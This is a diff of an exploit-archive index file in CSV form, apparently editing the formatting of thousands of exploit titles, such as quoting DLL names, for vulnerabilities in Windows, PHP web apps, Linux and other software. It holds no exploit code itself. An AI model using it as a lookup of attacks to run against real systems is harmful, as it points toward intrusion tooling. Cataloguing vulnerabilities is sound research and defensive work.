+18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - 'ov.dll' _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,windows,remote,0 18389,platforms/php/webapps/18389.txt,"Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting",2012-01-19,MaXe,php,webapps,0 18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 @@ -15961,7 +15961,7 @@ id,file,description,date,author,platform,type,port 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code Injection",2012-01-21,Or4nG.M4N,php,webapps,0 18403,platforms/php/webapps/18403.txt,"Nova CMS - Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0 18404,platforms/php/webapps/18404.pl,"iSupport 1.x - Cross-Site Request Forgery / HTML Code Injection (Add Admin)",2012-01-21,Or4nG.M4N,php,webapps,0 -18399,platforms/windows/dos/18399.py,"VideoLAN VLC Media Player 1.2.0 - (libtaglib_pluggin.dll) Denial of Service",2012-01-20,"Mitchell Adair",windows,dos,0 +18399,platforms/windows/dos/18399.py,"VideoLAN VLC Media Player 1.2.0 - 'libtaglib_pluggin.dll' Denial of Service",2012-01-20,"Mitchell Adair",windows,dos,0 18405,platforms/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0 18407,platforms/php/webapps/18407.txt,"WordPress Plugin AllWebMenus < 1.1.9 Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 @@ -15980,7 +15980,7 @@ id,file,description,date,author,platform,type,port 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - magentservice.exe Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0 18424,platforms/php/webapps/18424.rb,"vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection (Metasploit)",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0 -18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 +18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - Cross-Site Request Forgery / Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",multiple,webapps,0 18431,platforms/multiple/webapps/18431.txt,"Ajax Upload - Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 @@ -16075,7 +16075,7 @@ id,file,description,date,author,platform,type,port 18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow (Metasploit)",2012-02-29,Metasploit,windows,remote,0 +18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - 'ipswcom.dll' ActiveX Stack Buffer Overflow (Metasploit)",2012-02-29,Metasploit,windows,remote,0 18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access Workstation 5.9 - Profile (Metasploit)",2012-02-29,Metasploit,windows,remote,0 18540,platforms/hardware/webapps/18540.txt,"Yealink VOIP Phone - Persistent Cross-Site Scripting",2012-02-29,"Narendra Shinde",hardware,webapps,0 18541,platforms/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server - Denial of Service",2012-02-29,"SecPod Research",windows,dos,0 @@ -16099,7 +16099,7 @@ id,file,description,date,author,platform,type,port 18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - Local File Inclusion",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0 18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO - Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0 -18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control - (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 +18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 18600,platforms/multiple/dos/18600.txt,"presto! pagemanager 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 18601,platforms/multiple/dos/18601.txt,"EMC NetWorker 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18571,platforms/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 @@ -16135,7 +16135,7 @@ id,file,description,date,author,platform,type,port 18609,platforms/php/webapps/18609.txt,"FlexCMS 3.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-16,"Ivano Binetti",php,webapps,0 18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure",2012-03-16,KaHPeSeSe,windows,remote,0 18611,platforms/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - '.m3u' Buffer Overflow (Metasploit)",2012-03-16,KaHPeSeSe,windows,local,0 -18704,platforms/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control (pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 +18704,platforms/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 18705,platforms/hardware/dos/18705.txt,"Sony Bravia - Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",hardware,dos,0 18613,platforms/php/webapps/18613.txt,"ASP Classifieds - SQL Injection",2012-03-17,r45c4l,php,webapps,0 18614,platforms/php/webapps/18614.txt,"PRE PRINTING STUDIO - SQL Injection",2012-03-17,r45c4l,php,webapps,0 @@ -16177,7 +16177,7 @@ id,file,description,date,author,platform,type,port 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 -18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 - file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0 +18661,platforms/windows/dos/18661.txt,"RealPlayer - '.mp4' file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0 18676,platforms/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0 18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0 @@ -16186,8 +16186,8 @@ id,file,description,date,author,platform,type,port 18668,platforms/php/webapps/18668.txt,"vBshop - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-03-26,ToiL,php,webapps,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' Denial of Service (PoC)",2012-03-28,"Stefan Schurtz",windows,dos,0 18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 -18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0 -18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 +18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0 +18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam - ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 18679,platforms/multiple/remote/18679.rb,"Java - AtomicReferenceArray Type Violation (Metasploit)",2012-03-30,Metasploit,multiple,remote,0 @@ -16422,7 +16422,7 @@ id,file,description,date,author,platform,type,port 19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0 18993,platforms/php/webapps/18993.php,"WordPress Plugin Asset Manager 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18994,platforms/php/webapps/18994.php,"WordPress Plugin Font Uploader 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 -19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC msadcs.dll RDS DataStub Content-Type Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0 +19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0 18997,platforms/php/webapps/18997.php,"WordPress Plugin MM Forms Community 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18998,platforms/php/webapps/18998.php,"WordPress Plugin Gallery 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 @@ -16513,7 +16513,7 @@ id,file,description,date,author,platform,type,port 19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - Uploadify.php Arbitrary Code Execution (Metasploit)",2012-06-13,Metasploit,php,webapps,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 -19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0 +19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0 40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0 19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - Count.cgi Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0 @@ -16883,7 +16883,7 @@ id,file,description,date,author,platform,type,port 19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 -19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 +19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local,0 19509,platforms/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 @@ -17092,7 +17092,7 @@ id,file,description,date,author,platform,type,port 19715,platforms/php/webapps/19715.txt,"WordPress Plugin WP-Predict 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet - Field Bytecode Verifier Cache Remote Code Execution (Metasploit)",2012-07-11,Metasploit,java,remote,0 -19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution (Metasploit)",2012-07-11,Metasploit,windows,remote,0 +19718,platforms/windows/remote/19718.rb,"AdminStudio - 'LaunchHelp.dll' ActiveX Arbitrary Code Execution (Metasploit)",2012-07-11,Metasploit,windows,remote,0 19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 - preview Security Zone Settings Lag",2000-01-07,"Georgi Guninski",windows,remote,0 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist",2000-01-10,"Steve Fewer",windows,dos,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 - GRANT Global Password Changing",2000-02-15,"Viktor Fougstedt",multiple,local,0 @@ -17182,8 +17182,8 @@ id,file,description,date,author,platform,type,port 19808,platforms/cgi/remote/19808.txt,"Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access",2000-03-14,"Cerberus Security Team",cgi,remote,0 19809,platforms/windows/remote/19809.txt,"Oracle Web Listener 4.0.x - for NT Batch File",2000-03-15,"Cerberus Security Team",windows,remote,0 19810,platforms/windows/dos/19810.txt,"Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow",2000-03-16,"Ussr Labs",windows,dos,0 -19811,platforms/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel Exploit (1)",2000-03-13,funkysh,linux,local,0 -19812,platforms/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel Exploit (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 +19811,platforms/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel Exploit (1)",2000-03-13,funkysh,linux,local,0 +19812,platforms/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel Exploit (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd Exploit",2000-03-16,Sebastian,linux,local,0 19814,platforms/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 - Directory Indexing",2000-03-17,"Gabriel Maggiotti",multiple,remote,0 19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal",2000-03-21,"Johan Nilsson",windows,remote,0 @@ -17886,7 +17886,7 @@ id,file,description,date,author,platform,type,port 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",php,webapps,0 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - Cross-Site Request Forgery",2012-08-16,DaOne,php,webapps,0 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) - Remote Execution",2012-08-16,iJoo,linux,remote,0 -20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - MSHTML.dll Crash",2001-01-15,"Thor Larholm",windows,dos,0 +20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0 20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - '.wmz' Arbitrary Java Applet",2001-01-15,"Georgi Guninski",windows,remote,0 20554,platforms/linux/local/20554.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (1)",2001-01-13,IhaQueR,linux,local,0 20555,platforms/linux/local/20555.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (2)",2001-01-13,IhaQueR,linux,local,0 @@ -18013,7 +18013,7 @@ id,file,description,date,author,platform,type,port 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (2)",2001-03-08,"the itch",unix,local,0 -40426,platforms/windows/local/40426.txt,"MSI - NTIOLib.sys / WinIO.sys Local Privilege Escalation",2016-09-26,ReWolf,windows,local,0 +40426,platforms/windows/local/40426.txt,"MSI - 'NTIOLib.sys' / 'WinIO.sys' Local Privilege Escalation",2016-09-26,ReWolf,windows,local,0 20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 - Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",windows,remote,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0 20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,windows,dos,0 @@ -18877,7 +18877,7 @@ id,file,description,date,author,platform,type,port 21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",unix,remote,0 21575,platforms/multiple/dos/21575.txt,"Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0 40348,platforms/windows/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0 -21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - ext.dll Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote,0 +21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - 'ext.dll' Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote,0 21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0 21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",unix,remote,0 21579,platforms/unix/remote/21579.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (2)",2002-06-24,"Gobbles Security",unix,remote,0 @@ -19287,7 +19287,7 @@ id,file,description,date,author,platform,type,port 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 21989,platforms/php/webapps/21989.txt,"Cartweaver 3 - Local File Inclusion",2012-10-15,HaxOr,php,webapps,0 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 -21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p quartz.dll Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",windows,dos,0 +21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p 'quartz.dll' Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",windows,dos,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 21993,platforms/php/remote/21993.rb,"AjaXplorer - checkInstall.php Remote Command Execution (Metasploit)",2012-10-16,Metasploit,php,remote,0 21994,platforms/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,windows,local,0 @@ -19545,7 +19545,7 @@ id,file,description,date,author,platform,type,port 22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 - User Password Disclosure",2003-02-15,frog,php,webapps,0 22253,platforms/php/webapps/22253.txt,"DotBr 0.1 - System.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 22254,platforms/php/webapps/22254.txt,"DotBr 0.1 - Exec.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 -22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 - Riched20.dll Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 +22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 22256,platforms/php/webapps/22256.txt,"D-Forum 1 - header Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22257,platforms/php/webapps/22257.txt,"D-Forum 1 - footer Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0 @@ -19651,10 +19651,10 @@ id,file,description,date,author,platform,type,port 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2)",2003-04-10,"Wojciech Purczynski",linux,local,0 22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass",2003-03-17,"dong-h0un U",cgi,webapps,0 -22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV ntdll.dll Buffer Overflow (1)",2003-03-24,mat,windows,remote,0 -22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV ntdll.dll Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0 -22367,platforms/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV ntdll.dll Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote,0 -22368,platforms/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV ntdll.dll Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 +22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0 +22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0 +22367,platforms/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote,0 +22368,platforms/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x - UUEncoding Parsing Memory Corruption",2003-03-17,"Core Security",linux,remote,0 22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service",2003-03-17,"Core Security",linux,dos,0 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion",2003-03-19,"Core Security",linux,remote,0 @@ -19794,14 +19794,14 @@ id,file,description,date,author,platform,type,port 22507,platforms/asp/webapps/22507.txt,"Web Wiz Forum 6.34 - Information Disclosure",2003-04-17,"Uziel aka nuJIurpuM",asp,webapps,0 22508,platforms/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x - Rejected Connection Memory Leakage Denial of Service",2003-04-18,"Steve Grubb",linux,dos,0 22509,platforms/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",multiple,remote,0 -22511,platforms/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue - ext.dll Command Execution",2003-04-20,"Matthew Murphy",windows,remote,0 +22511,platforms/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue - 'ext.dll' Command Execution",2003-04-20,"Matthew Murphy",windows,remote,0 22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorisation Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos,0 22513,platforms/asp/webapps/22513.txt,"MPCSoftWeb 1.0 - Database Disclosure",2003-04-21,drG4njubas,asp,webapps,0 22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorisation Format String",2003-04-21,"Matthew Murphy",multiple,dos,0 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x - Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",windows,remote,0 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0 22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 - 'index.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 -22518,platforms/windows/dos/22518.html,"Microsoft Shlwapi.dll 6.0.2800.1106 - Malformed HTML Form Tag Denial of Service",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 +22518,platforms/windows/dos/22518.html,"Microsoft 'Shlwapi.dll' 6.0.2800.1106 - Malformed HTML Form Tag Denial of Service",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 - board.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 - member.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22522,platforms/multiple/remote/22522.pl,"Web Protector 2.0 - Trivial Encryption",2003-04-22,rjfix,multiple,remote,0 @@ -19813,7 +19813,7 @@ id,file,description,date,author,platform,type,port 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0 22528,platforms/windows/local/22528.c,"Microsoft Windows 2000 - RegEdit.exe Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0 22529,platforms/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum - 'login.asp' SQL Injection",2003-04-23,Du|L,asp,webapps,0 